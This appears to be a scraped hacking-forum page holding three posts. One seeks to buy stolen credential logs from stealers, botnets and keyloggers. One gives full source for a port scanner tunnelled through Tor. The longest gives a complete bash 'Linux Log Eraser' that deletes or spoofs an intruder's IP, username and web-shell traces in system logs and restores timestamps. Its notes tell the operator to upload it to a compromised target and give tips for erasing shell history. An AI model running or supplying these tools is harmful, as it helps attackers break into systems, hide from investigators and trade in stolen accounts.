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  1. Hello i am buying Stealer Botnet Keylogger logs which contains email password or username password please get intouch with me on ICQ or SKype i can pay via Bitcoins Perfect Money Webmoney and Paypal also available Thank you
  2. # tmap 0.1 # Coded by TheKingOf9x <AT> yandex . com # Fast multi-threaded port scanner which tunnels through TOR. # Depends on the PySocks library: https://github.com/Anorov/PySocks # And of course TOR: apt-get install tor # # Do not use hostnames, may leak DNS info. only use IP addresses. # # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this. # # Usage: # python tmap.py import sys import socks import datetime import threading lock = threading.Semaphore(value = 1) #Port of TOR server TOR_PORT = 9050 #timeout. Experiment with this. TIMEOUT = 20 #Port list to scan, ammend at will ports = (21,22,23,80,443,1433,3306,8080) def main(): if len(sys.argv) < 3: print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m") print("Single host scan:\npython " + sys.argv[0] + " -s\n") print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n") print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n") exit(0) scan_type = sys.argv[1] parameter = sys.argv[2] filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap") try: log = open(filename, "a") except: pass if scan_type == "-s": host_scan(parameter, log) elif scan_type == "-r": range_scan(parameter, log) elif scan_type == "-l": list_scan(parameter, log) else: exit(1) #main connect function def connect(ip, port, log): try: s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', TOR_PORT) s.settimeout(TIMEOUT) s.connect((ip, port)) output = ip + ":" + str(port) lock.acquire() # Lock/unlock to clean up screen output. print(output) try: log.write(output + "\n") except: pass except: pass finally: lock.release() def host_scan(ip, log): ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass def range_scan(ip, log): ip = ip.strip() for i in range(1, 255): ip_addr = ip + "." + str(i) for port in ports: try: t = threading.Thread(target=connect, args=(ip_addr, port, log)) t.start() except: pass def list_scan(parameter, log): try: f = open(parameter, 'r') except: print("Could not open file: " + parameter) exit(1) for ip in f: ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass if __name__ == '__main__': main() Download Source
  3. LINUX LOG ERASER by b0nd #! /bin/bash # June 2011 clear # A separate file to contain the absolute path for log files. Do edit that per your requirement source log_files.sh # Scroll to the end of code to see the progrom flow # The following arrays would only store the names of the log files found on system # Not making them read-only as they have to be edited later to add in the existing log file names found_ascii_log_files=() found_binary_log_files=() rtr="" # A global variable needed to get array back as a return value from "check_time_stamping" function flag=0 # A global variable to determine whether the back door path has to be deleted or not spoof_user="root" # All the entries for the "user_name" spoofing would be replaced by string "root" in non-ASCII log files # Default banner of the script default_banner () { cat << EOF ############################################################################ Linux Machine Log-Eraser Script Ver 0.3 - Third Release Greetz to: GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ Usage: $0 [options] -h help ############################################################################ EOF call_exit } # Help banner of the script. It depicts the usage of various options help_banner () { cat << EOF GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | \gggggg | \______/ Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i * To search in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 30 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d -s -u "cracker" * To delete lines containing and|or user_name "cracker" from ASCII files, and * To spoof in non-ASCII files by and user_name "cracker" by "root" Ex: $0 -d -s -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof in non-ASCII files by and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com EOF call_exit } # Checking and storing the log files found on system existing_log_files () { for i in ${ascii_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_ascii_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done for i in ${binary_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_binary_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done } # Basic Information which might help user customizing script for the first time search_log_files () { echo -e "\n>>>>>>>>>>>>> Basic Information <<<<<<<<<<<< \n" echo -e "[*] Linux Kernel: `uname -a`" echo -e "\n[*] The various log files found on system (per our script log_files.sh database):" j=0 # following is the call to function to determine the log files found on system existing_log_files echo -e -n "\n\t[*] ASCII Log Files\n" for i in ${found_ascii_log_files[@]} do echo -e "\t\t$i" done echo -e -n "\n\t[*] Binary Log Files\n" for i in ${found_binary_log_files[@]} do echo -e "\t\t$i" done # The following code is to find all the log files containing the IP fetched to parameter -i # e.g. this should be the IP which attacker is willing to find and erase/spoof in log files verify_ip $search_ip # The value for search_ip is obtained from command line arguments (parameter -i) echo -e "\n[*] Searching for IP $search_ip in all non-zip log files (/var/log/*)" # The following won't check the zipped files. # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command if [[ "`grep -rlw $search_ip /var/log*`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any log file" else echo -e "\n\t[*] The IP $search_ip has appeared in following log files:" grep -rlw $search_ip /var/log/* | awk ' { print " " $1 } ' fi # The following would check for gz files in /var/log directory. Hard binded for .gz extension. Make it generic if needed have_zgrep=`which zgrep` # It's affecting the atime value, and nothing has been coded to restamp the atime against this zgrep command if [[ "$have_zgrep" == "" ]] then echo -e "\n[*] zgrep could not be found on system" echo -e "\n\t[*] Skipping searching zip files for IP matching. Take care yourself :)" else echo -e "\n[*] zgrep found on system, so checking zip files as well." if [[ "`zgrep -lw $search_ip /var/log/*.gz`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any zip log file (/var/log/*)" else echo -e "\n\t[*] The IP $search_ip has appeared in following zip log files in /var/log directory:" echo -e "\n\t[*] The script in current form does not edit zip files. Take care of your (|) yourself" zgrep -lw $search_ip /var/log/*.gz | awk ' { print " " $1 } ' fi fi echo -e "\n\t[!] It is recommended to include the above found log files, if not already in the list, in the script (log_files.sh)" echo -e "\t[!] Edit the file log_files.sh per your requirements" # Finding the IP's listed in all log files. The most common IP's could be a good choice for spoofing your original IP # Display Top 20 IP's to make choice from echo -e "\n[*] Displaying top 20 IP addresses found in log files" echo -e "\n\t[*] It is recommended to choose any suitable one among them to spoof your IP" touch tmp-counter.txt local ip_counter=0 echo -e -n "\n\tPlease wait " # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command # The following grep command would find all the IP look alikes present in all the log files in /var/log/*. # The sort will finally give the uniqe ones for i in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2 | sort -u) do # The following grep command is same as above but missing the trailing sort -u, hence all the multiple occurence would be listed. # This would help in finding out the occurence of each IP in log files i.e., take one IP from the uniqe list and compare it with # all the IP's in unsorted list, whenever there is a match, that would indicate re-occurence and hence the ip_counter would increase by 1 for j in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2) do if [[ $i == $j ]] then ip_counter=$[$ip_counter + 1] fi done echo -e -n "." echo "$ip_counter number of times $i has occured in log files" >> tmp-counter.txt ip_counter=0 done echo -e "\n\n\t[*] TOP 20 IP (look alikes) found in log files:\n" cat tmp-counter.txt | sort -g -r | head -n 20 | awk ' { print " " $1 " times -----> " $5 } ' rm tmp-counter.txt call_exit } call_exit () { echo -e "\n[*] Exiting.....\n" #cat << EOF echo -e "\n\t\tWould you mind removing script execution traces from history?" echo -e "\t\t=============================================================" echo -e " ==> http://www.garage4hackers.com/showthread.php?1032-Linux-HISTORY-How-to-avoid-getting-logged\n" # 1. Do not get logged; use the space technique. # # echo \$HISTCONTROL # if the output in not "ignorespace" (without quotes); do # # export HISTCONTROL=ignorespace # Now just give a space in front of any command and it would not be logged in history # 2. Another way of not getting logged: # # history -d \$((HISTCMD-1)) && type_your_command_here_and_execute # e.g # history -d \$((HISTCMD-1)) && whoami # 3. If the script has already been executed without taking precautions, either of the following can be done # to remove the traces: # a) # history -d \$((HISTCMD-2)) && history -d \$((HISTCMD-1)) # The above command would remove the last entry from history. # Executing it couple of times would delete couple of entries # # history # Note down the command number and then execute: # # history -d offset # It would delete the respective entry from history # c) To delete a group of consecutive commands # Let us assume there are 50 commands in history and you wish to delete commands from 30 to 50 # # for i in {51..30}; do history -d "\$i"; done; #EOF exit } fuck_log_files () { # following is the call to function to determine the log files found on system existing_log_files echo "FTW! Erasing all log files" for i in ${found_ascii_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done for i in ${found_binary_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done echo "Done!" call_exit } verify_ip () { # First check is to verify that the chars entered as IP are integers # Second check has been made to confirm that only 3 dots are there in IP address # Third check is to mark the valid IP range. The octect value can not be < 0 or > 255 str="$1" # $1 is the first function parameter i.e. IP address here cnt=${#str} # Counting the length of string fetched i.e total chars in IP address, including dots dot_counter=0 for ((i=0; i < cnt; i++)) do char=${str:$i:1} # Reading one character at a time from the input string. Taken from http://www.unix.com/unix-dummies-questions-answers/80215-access-each-character-string.html #code=`printf %s "$char" | od -An -vtu1 | sed 's/^[^1-9]*//'` # copied from http://unix.derkeiler.com/Newsgroups/comp.unix.shell/2004-08/0195.html code=`printf '%d' "'$char"` # Echo the ASCII value of character # The first check if [ $code -lt 48 ] || [ $code -gt 57 ] # Comparing the ASCII value range of Intergers ( 48 - 57 ) then if [ $code -ne 46 ] # To check the "." value then echo -e "\n[*] Err!!! Not a valid IP (some non-integer characters), try again.....\n" call_exit else dot_counter=$[$dot_counter + 1] fi fi done # The second check if [ $dot_counter -ne 3 ] then echo -e "\n[*] Err!!! Not a valid IP (check the number of dots in IP Address), try again.....\n" call_exit fi # The third check # Extract the octets octet_a=`echo $1 | cut -d "." -f1` octet_b=`echo $1 | cut -d "." -f2` octet_c=`echo $1 | cut -d "." -f3` octet_d=`echo $1 | cut -d "." -f4` if [ \( $octet_a -lt 0 -o $octet_a -gt 255 \) -o \( $octet_b -lt 0 -o $octet_b -gt 255 \) -o \( $octet_c -lt 0 -o $octet_c -gt 255 \) -o \( $octet_d -lt 0 -o $octet_d -gt 255 \) ] then echo -e "\n[*] Err!!! Not a valid IP (octet value >=0 and <=255), try again.....\n" call_exit fi } # A function to verify whether the user name fetched to script exists or not # The script will not delete any log line based on user-name "root", else most of the logs would get delete verify_user_name () { local user_name="$1" # $1 is the first function parameter i.e. user-name here if [ $user_name != "root" ] then if [[ `cat /etc/passwd | cut -d ":" -f1 | grep $user_name` != $user_name ]] then echo -e "\t[*] User name does not exist" echo -e "\t[*] Instead of exiting, script will proceed considering you wish to delete logs of some old account which does not exist anymore" else echo -e "\t[*] user_name ($user_name) verified!" fi else echo -e "\t[*] User name is 'root'. Script will still take care not to delete lines based on this user name" echo -e "\t[*] user_name ($user_name) verified!" fi } # A function to obtain the original time stamping of the log file before editing the file check_time_stamping () { echo -e "======================================================================" filename=$1 echo -e "\n[*] Log File Under RADAR: $filename" local atime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local mtime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local array=() array=($atime $mtime) rtr=(${array[@]}) # rtr is a global variable } # The function to edit the log files and restore the Time (time stamping) edit_ascii_file_and_timestamping () { for log_file in ${found_ascii_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files echo "inside for loop" check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" # Edit only that file which has the desired string/IP in it. Don't touch others unnecessary. # The following if and grep stuff does the same. If found IP in file then edit else don't. Err! haven't followed strictly # -w is needed else if you intend to delete, it would delete all* as well if grep -qsw "$1" "$log_file" # $1 is the parameter passed to this function, IP in this case then echo -e "\n[*] The IP $1 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$1/d" $log_file > $log_file.new mv $log_file.new $log_file fi if [ $2 != 'root' ] # $2 is the 2nd parameter passed to this function, User name in this case then if grep -qsw "$2" "$log_file" # If user name fetched to script found in log file and that is not 'root' then echo -e "\n\n[*] The username $2 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$2/d" $log_file > $log_file.new mv $log_file.new $log_file fi fi if [ $flag -eq 1 ] # flag=1 states that a web shell path too has to be removed from log files then echo -e "\nflag = 1, Deleting Backdoor Shell PATH: $3" sed -e "s@$3@@g" $log_file > $log_file.new mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # actime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after editing the log file" echo -e "\tatime: $aatime" echo -e "\tmtime: $amtime" # echo "ctime: $actime" echo -e "\n[*] Restoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file #touch -ct $ctime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # aactime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after restoring the time stamp" echo -e "\tatime: $aaatime" echo -e "\tmtime: $aamtime" # echo "ctime: $aactime" echo -e "\n======================================================================\n\n" done } edit_binary_file_and_timestamping () { for log_file in ${found_binary_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} # ctime=${out[2]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" echo -e "\nSpoofing IP $1 in binary log file with IP $2" echo "Sleeping for 5 sec" sleep 5 sed "s/$1/$2/g" $log_file > $log_file.new mv $log_file.new $log_file if [ $3 != 'root' ] then echo -e "\nSpoofing user name..." echo "Sleeping for 5 sec" sleep 5 sed "s/$3/$spoof_user/g" $log_file > $log_file.new # Edit the global variable spoof_user at the top mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n\nTime Stamping after editing the log file" echo "atime: $aatime" echo "mtime: $amtime" echo -e "\nRestoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\nTime Stamping after restoring the time stamp" echo "atime: $aaatime" echo "mtime: $aamtime" echo -e "\n======================================================================\n\n" done } verify_IPs_and_user_name () { echo "[*] Verifying ip_address $ip_to_be_deleted ..." verify_ip $ip_to_be_deleted # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] ip_address ($ip_to_be_deleted) verified!\n" echo -e "\n[*] Verifying spoof_ip_address $spoof_ip ..." verify_ip $spoof_ip # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] spoof_ip_address ($spoof_ip) verified!\n" echo -e "\n[*] Verifying user_name: '$user_name' ..." verify_user_name $user_name } search_web_backdoor_shells () { for extension in ${extension_type[@]} # Now the array already holds the various backdoor extensions fetched do echo -e "\n\t[*] Checking for Extension: $extension" sleep 1 # The following would find and display + outputs the result to a text file grep -RPl --include=*.$extension "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" $web_root_directory | tee -a output.txt | awk ' { print " " $1 } ' done echo -e "\n\t[!] Done! The out put has been stored in output.txt in append mode. Do not forget to delete it.\n" call_exit } lets_begin_the_show () { # Check: If "-e" and "-r", then just find the back door shells and exit if [[ -n $web_root_directory ]] then search_web_backdoor_shells # Check: If non "-e"|"-r" then proceed with deleting logs etc. elif [[ -n $ip_to_be_deleted ]] then verify_IPs_and_user_name if [[ -z $web_shell_path ]] then # Call the function with 2 values; no web shell path has been fetched. No spoofing, just delete the lines. edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name else # Call the function with 3 values; delete web shell path as well. No spoofing, just delete the lines. flag=1 edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name $web_shell_path fi # Call the function to spoof the original IP and user name. No deletion, just spoofing (they being binary files). edit_binary_file_and_timestamping $ip_to_be_deleted $spoof_ip $user_name else echo -e "\nSome issue which I could not catch" call_exit fi } verify_combination_of_command_line_arguments () { # Check 1: None of the argument has been passed if [[ -z $ip_to_be_deleted ]] && [[ -z $spoof_ip ]] && [[ -z $user_name ]] && [[ -z $extension_type ]] && [[ -z $web_root_directory ]] then echo -e "\n[*] Error! None of the required argument has been passed" default_banner call_exit fi # Check 2: Nothing should be passed in combination with "-e" and "-r" if ( [[ -n $extension_type ]] || [[ -n $web_root_directory ]] ) && ( [[ -n $web_shell_path ]] || [[ -n $ip_to_be_deleted ]] || [[ -n $spoof_ip ]] || [[ -n $user_name ]] || [[ -n $web_shell_path ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Do not mix -e and -r with any other flag!" default_banner call_exit fi # Check 3: "-e" and "-r" shall be together if ( [[ -n $extension_type ]] && [[ -z $web_root_directory ]] ) || ( [[ -z $extension_type ]] && [[ -n $web_root_directory ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[*] -e and -r must be specified together and must be non-empty!" default_banner call_exit fi # Check 4: If one of the following, the first one, is stated then rest must be if [[ -n $ip_to_be_deleted ]] && ( [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -s and -u when -d specified!" default_banner call_exit fi # Check 5: If one of the following, the first one, is stated then rest must be if [[ -n $spoof_ip ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -u when -s specified!" default_banner call_exit fi # Check 6: If one of the following, the first one, is stated then rest must be if [[ -n $user_name ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -s when -u specified!" default_banner call_exit fi # Check 7: If first one is stated, then rest must be if [[ -n $web_shell_path ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d, -s and -u when -w specified!" default_banner call_exit fi } # ---------------------------------------- The program execution starts from here ------------------------------- #### Checking UID and EUID value #### #### Only allow root to execute this script as non-root might not have write access to log files if [ "$UID" != "0" ] then if [ "$EUID" != "0" ] then echo -e "\n[*] Cannot run script: Permission denied." "Please be root to use this script". call_exit fi fi #### Show default_banner if no argument has been passed if [ $# -eq 0 ] then default_banner fi # Following variables are for the command line arguments search_ip= ip_to_be_deleted= spoof_ip= user_name= web_shell_path= extension= # This one to handle the multiple extensions give to grep from command prompt web_root_directory= extension_type=() # This array will hold the multiple extensions j=0 while getopts ":hi:fd:s:u:w:e:r:" option do case $option in h) help_banner ;; i) search_ip=$OPTARG search_log_files ;; f) fuck_log_files ;; d) ip_to_be_deleted=$OPTARG # All the verifications would be done later once combination of command line arguments have been verified ;; s) spoof_ip=$OPTARG # Same as above ;; u) user_name=$OPTARG # Same as above ;; w) web_shell_path=$OPTARG echo "WEB-SHELL-PATH: $web_shell_path" # No verification could be done for it ;; e) for extension in $OPTARG do extension_type[ $j ]=$extension # Holding multiple extensions passed at command line j=$[$j + 1] done ;; r) web_root_directory=$OPTARG echo -e "\t[*] Web-Root Directory: $web_root_directory" ;; ?) echo -e "\n[*] Wrong argument passed" default_banner ;; esac done # Call to following function to verify the combination of command line arguments passed to script verify_combination_of_command_line_arguments # Following function call is necessary in order to find the available log files on system existing_log_files # Following function call would be made only after all the mandatory arguments have been passed to the script lets_begin_the_show Log File: ####################### # Declaration of two arrays containing the absolute path of log files. Add in more path per your requirements # Since declared outside any function, they are global # declare -r makes our array read-only and could not be altered anywhere in the code following the declaration ####################### # Those logs files which keep entries for IP address, web path accessed etc. Basically the ASCII log files. declare -r ascii_log_files=( #'/var/log/syslog' #'/var/log/messages' #'/var/log/httpd/access_log' #'/var/log/httpd/error_log' #'/var/log/xferlog' #'/var/log/secure' #'/var/log/auth.log' #'/var/log/user.log' # Check syslog.conf for more log files # Enter more log files here ) # Those logs files which keep user activity logs. Basically the non-ASCII log files. declare -r binary_log_files=( #'/var/log/wtmp' #'/var/log/lastlog' #'/var/log/btmp' #'/var/run/utmp' # Enter more log files here ) Usage: Linux Log Eraser ================ Linux Log Eraser is a bash script which erases almost all your logs from the log files on a Linux machine. This can be useful for an attacker to wipe out the traces before logging out of the compromised Linux machine. Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i * To search in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 20 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d -s -u "cracker" * To delete lines containing and|or user_name "cracker" from ASCII files, and * To spoof in non-ASCII files by and user_name "cracker" by "root" Ex: $0 -d -s -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof in non-ASCII files by and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com Customizing the script while executing for the first time on target: ==================================================================== 1. Upload both, the linux_log_eraser.sh and log_files.sh on target server 2. Fire the linux_log_eraser script. Take care that you must be root (either UID=0 or EUID=0) to execute the script 3. Use parameter -i, and pass the IP address you are worried about in log files: ./linux_log_eraser -i 4. The above command will scan all the log files for that particular IP and will let you know all the log files having trace of that IP 5. Open up log_files.sh file. Cross check which log file, reported in step 4, is not in the list. Do add the log file/files 6. Running the step 3 command would also let you know the top 20 IP's in the log files having most occurrences 7. Choose any suitable IP from the top 20 IP's as a spoof IP.....and you are ready to proceed with other options of script Logic: ====== Some log files are Ascii types, hence can be read and edited easily. Rest log files are binary types and are hard to read and edit directly. For ascii files, all the lines in various log files containing either of the following would be deleted: 1. The IP following -d parameter 2. User name following -u parameter (if it is other than root). Since the user 'root' has many entries, so to remain stealty it's better not to delete such lines. 3. Web shell path of your backdoor following -w parameter. For binary files, all the entries for your IP and user name (if it is other than root) would be spoofed (not deleted) IP would be spoofed to the Spoof IP provided and user name would be spoofed to "root" Pass the following to script: 1. The IP which you wish to delete/spoof in log files 2. The spoof IP. This would be the IP to replace the IP in binary log files 3. The user name you wish to delete/spoof in log files 4. Absolute web shell path to erase it's entries from log files (e.g. the web back doors) For spoofing in binary files, better analyze the files manually first and choose a good IP and user name You can do the following for binary file analysis: For wtmp: #last (shows: username, terminal, IP) #strings /var/log/wtmp (shows: username, terminal, IP) For utmp: #who (shows: username, terminal, IP) #strings /var/run/utmp (shows: username, terminal, IP) For lastlog: #lastlog (shows: username, terminal, IP) #strings /var/log/lastlog (shows: terminal, IP) For btmp (if exists): #lastb (shows: username) #strings /var/log/btmp (shows: username) Correct me if the logic is wrong at any place except for "/var/log/lastlog"
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